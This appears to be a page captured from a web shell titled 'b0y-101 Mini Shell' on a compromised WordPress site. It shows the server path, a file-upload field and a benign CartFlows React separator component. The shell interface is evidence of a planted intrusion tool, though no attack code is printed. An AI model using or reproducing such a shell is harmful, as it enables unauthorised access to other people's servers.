b0y-101 Mini Shell


Current Path : E:/www/km/wp2/wp-content/plugins/cartflows/modules/gutenberg/src/components/separator/
File Upload :
Current File : E:/www/km/wp2/wp-content/plugins/cartflows/modules/gutenberg/src/components/separator/index.js

/**
 * External dependencies
 */
import styles from './editor.lazy.scss';
import React, { useLayoutEffect } from 'react';

const Separator = () => {
	// Add and remove the CSS on the drop and remove of the component.
	useLayoutEffect( () => {
		styles.use();
		return () => {
			styles.unuse();
		};
	}, [] );

	return <div className="spectra-separator" />;
};

export default Separator;

Copyright © 2019 by b0y-101